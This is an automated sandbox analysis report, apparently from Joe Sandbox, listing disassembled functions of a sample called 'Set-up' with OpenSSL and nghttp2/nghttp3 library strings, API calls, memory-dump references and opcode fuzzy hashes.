Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8

Strings

ASN1_STRING_set, xrefs: 0019447D
crypto/asn1/asn1_lib.c, xrefs: 00194487, 001944DB

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: e45ce270cf76e1f3dc7ee78c3b5d467384bdf66c1360e9d733aaede36bfda9bd
Instruction ID: 0fc963eb93afb2ebfc3a6a021c98911a6b6eac37d99c86019e0454508d0a0325
Opcode Fuzzy Hash: e45ce270cf76e1f3dc7ee78c3b5d467384bdf66c1360e9d733aaede36bfda9bd
Instruction Fuzzy Hash: 00112BB1A0421457EF216E649C82F3B7798EB55750F160169FD59AB3C2FB60EC01C2F2

Function 000CC220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 000CC4E7

Strings

nghttp3_qpack.c, xrefs: 000CC4DD
(size_t)(p - pbuf->last) == len, xrefs: 000CC4E2

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: b247268feb9fff6ce5546be9e94fd52f9cc628cf308139177104301d672c2041
Instruction ID: 8b31552b39ddf4d823356d6a7a38b2aed5b20ef404917f079f46e743af9594a5
Opcode Fuzzy Hash: b247268feb9fff6ce5546be9e94fd52f9cc628cf308139177104301d672c2041
Instruction Fuzzy Hash: 7781D471A083409FE7189F2CC894F2EB7D2EB99714F18867CE8998B3E2D635DC458785

Function 000CC520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,000CB434,?,?,00000000,00000000,?,?), ref: 000CC68A

Strings

nghttp3_qpack.c, xrefs: 000CC680
(size_t)(p - rbuf->last) == len, xrefs: 000CC685

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: 779aab22b3599167651044216416c7918d27d969e098fcb638be22c5310f7523
Instruction ID: f4d087c823d19e051a4ca7495134cec86c9b034114e69852da77722751abf07b
Opcode Fuzzy Hash: 779aab22b3599167651044216416c7918d27d969e098fcb638be22c5310f7523
Instruction Fuzzy Hash: 9A41E2717082005FE7099B28D894F6EBBD2EBD9314F18857CE88DCB392D935DD458785

Function 000D2600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 000D27D1

Strings

nghttp3_qpack.c, xrefs: 000D27C7
nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 000D27CC

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: 6d28efcef2923c457b2b239a1731a16eef19ab031a6235ca806f46ef83b0a4a0
Instruction ID: 9fd50ad4b36460416892c0247183aceb02a17c7c10a2b9cf026b8329dfd0db81
Opcode Fuzzy Hash: 6d28efcef2923c457b2b239a1731a16eef19ab031a6235ca806f46ef83b0a4a0
Instruction Fuzzy Hash: FA51E875A083048FD714AF28D884B6AB7D6FF98314F09867DEC989B392EA34DD058B51

Function 000BC3A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 000BC50A

Strings

0 == rv, xrefs: 000BC505
nghttp2_map.c, xrefs: 000BC500

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == rv$nghttp2_map.c
API String ID: 1222420520-2488825769
Opcode ID: c97d25a203c0ef042b0b87fabbc4e0a341e8906eda22a87770b6ba43312bf1af
Instruction ID: 3fecbeb2c00df1892be9670e240dcd5d15577fb2746a80650c987f1e2bd4b5ea
Opcode Fuzzy Hash: c97d25a203c0ef042b0b87fabbc4e0a341e8906eda22a87770b6ba43312bf1af
Instruction Fuzzy Hash: DA5103756087069FD310CF19C880A6AFBE5FF88754F058A2EE998A7310E730E955CF92

Function 000BC220 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(data,nghttp2_map.c,000000DD), ref: 000BC394

Part of subcall function 000BC3A0: _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 000BC50A

Strings

nghttp2_map.c, xrefs: 000BC38A
data, xrefs: 000BC38F

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: data$nghttp2_map.c
API String ID: 1222420520-1279632610
Opcode ID: c8e6a74eefd574c3757cb7d13acfc278eb1fe7dd45b6e810e73f951ca8639c22
Instruction ID: 72efa3121928fc0e952cf818712e563f697d0ac35641f4cc9b426f0018b9ac01
Opcode Fuzzy Hash: c8e6a74eefd574c3757cb7d13acfc278eb1fe7dd45b6e810e73f951ca8639c22
Instruction Fuzzy Hash: AE4148B5A087069FD754CF19D480A6AB7E1FF88700F54C92DE99AC7351E730E915CB82

Function 000C45C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 000C468C

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 000C4687
nghttp3_conn.c, xrefs: 000C4682

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 90cd8dbb2ed7bd928e33b87b332af34faf7396c60e4c81c7962ffe09dfb2f28d
Instruction ID: cedde248ec4f0b057b43c72eca1d16ef6a3d9930457b3a0f7390e1896b8556cd
Opcode Fuzzy Hash: 90cd8dbb2ed7bd928e33b87b332af34faf7396c60e4c81c7962ffe09dfb2f28d
Instruction Fuzzy Hash: A231C5716006016BD6109B24EC85FAF77E8FF86369F04062DF95887282E731E814C7B2

Function 000C4400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 000C44B7

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 000C44B2
nghttp3_conn.c, xrefs: 000C44AD

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 01f7bb082614916265ccd4305be684ca051fbbab2f5a3ad8c7a0db8c64840b8f
Instruction ID: a85e3950be9e9154051fcd428fade0b89d3ead2090c97b7ad1c873cc09d96313
Opcode Fuzzy Hash: 01f7bb082614916265ccd4305be684ca051fbbab2f5a3ad8c7a0db8c64840b8f
Instruction Fuzzy Hash: 6B21CF76100601ABEB105B64DC45FAB77EAAF84365F08046CFA19C62A3FB36D4159761

Function 0039A0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0039A161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0039A2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0039A3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0039A499

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 5457c47c720ad006b8d265b13c42270cf219ec2930d8984f87fdb8b1f46f8f45
Instruction ID: 11a47ca4c0924d4d3b5f723df4826ebe915e0c6c6881d2e41d5d1c3264d58cdc
Opcode Fuzzy Hash: 5457c47c720ad006b8d265b13c42270cf219ec2930d8984f87fdb8b1f46f8f45
Instruction Fuzzy Hash: D9C18A716046109FCF05DF2DC888A6A7BE5BF89314F1A4A6DE8498B356D771EC40CBC6

Function 000C6140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0009D7A7,?,?,0009D7A7), ref: 000C61CF

Strings

i < len || offset == 0, xrefs: 000C61CA
nghttp3_stream.c, xrefs: 000C61C5

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: 9af97f980bab1d7541e4a606db13877f2eb19df5f72a76e77d2556b2e44d815f
Instruction ID: d080281f847a4df2d8e14c3f9d6b824bd9f13271123b80821304e43fa7c13508
Opcode Fuzzy Hash: 9af97f980bab1d7541e4a606db13877f2eb19df5f72a76e77d2556b2e44d815f
Instruction Fuzzy Hash: B4116D755043148FD314EF68D888FAA77E5FB88321F0A44BDED49473A3EA316945CBA2

Function 000C8700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,000C88D3,00000010,?,?,00000000,000C9AE3,000CACDD,-00000010,?,?,?,00000000,?), ref: 000C873C

Strings

(blklen & 0xfu) == 0, xrefs: 000C8737
nghttp3_balloc.c, xrefs: 000C8732

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: 2f90f28bee763813728dd9fdcf39e9f9efd7459006a2e3dbff90d766e63d2cd8
Instruction ID: 215094da8ce3fd83943c465195b89779999ffdc7599b0d92dba48133748060f0
Opcode Fuzzy Hash: 2f90f28bee763813728dd9fdcf39e9f9efd7459006a2e3dbff90d766e63d2cd8
Instruction Fuzzy Hash: 4711A1756093405FC7129B24DC46F9ABFB1AF42704F1DC59DE848AB293E674EC04C755

Function 0004C1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 0004C1E5
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0004C1F4

Strings

\/@, xrefs: 0004C1DF

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlenstrpbrk
String ID: \/@
API String ID: 3089284949-4263999291
Opcode ID: 1712ca4108cb59c586fb9b9fedf72e77001028de8af34d08468ad7e809c34a87
Instruction ID: 669f894a7c79601c66b185e216d1b796c88244e4925e55b2d2000b87421b1678
Opcode Fuzzy Hash: 1712ca4108cb59c586fb9b9fedf72e77001028de8af34d08468ad7e809c34a87
Instruction Fuzzy Hash: 9CE0CDD3A0511115E7A221FDBC02FBE5794D7C2A61F1D0277F555D2204F6F489514292

Function 000BA5A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp2_rcbuf.c,00000058,000B5E1F,?), ref: 000BA5D6

Strings

rcbuf->ref > 0, xrefs: 000BA5D1
nghttp2_rcbuf.c, xrefs: 000BA5CC

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
